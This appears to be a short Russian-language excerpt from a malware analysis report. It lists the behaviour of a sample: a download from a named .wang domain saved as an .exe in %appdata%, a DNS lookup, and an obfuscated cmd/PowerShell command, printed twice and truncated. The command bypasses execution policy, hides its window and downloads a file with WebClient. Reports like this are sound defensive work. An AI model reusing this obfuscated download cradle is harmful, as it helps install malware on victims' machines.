Техническая информация
- http://transporingsytw.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoWe^RShel^L.E^xE^ -eXeC^utION^poliC^Y^ ^BYpas^s^ -^NOPR^ofI^Le -W^iNdowSTylE hi^Dd^en (NeW^-Ob^J^ect System.^n^e^t.we^B^CLIEn^t)^.DowNl^OaD^F^ILe^(^'http://transporingsytw.w...
- DNS ASK tr#####ringsytw.wang
- '<SYSTEM32>\cmd.exe' /c "PoWe^RShel^L.E^xE^ -eXeC^utION^poliC^Y^ ^BYpas^s^ -^NOPR^ofI^Le -W^iNdowSTylE hi^Dd^en (NeW^-Ob^J^ect System.^n^e^t.we^B^CLIEn^t)^.DowNl^OaD^F^ILe^(^'http://transporingsytw.w...' (со скрытым окном)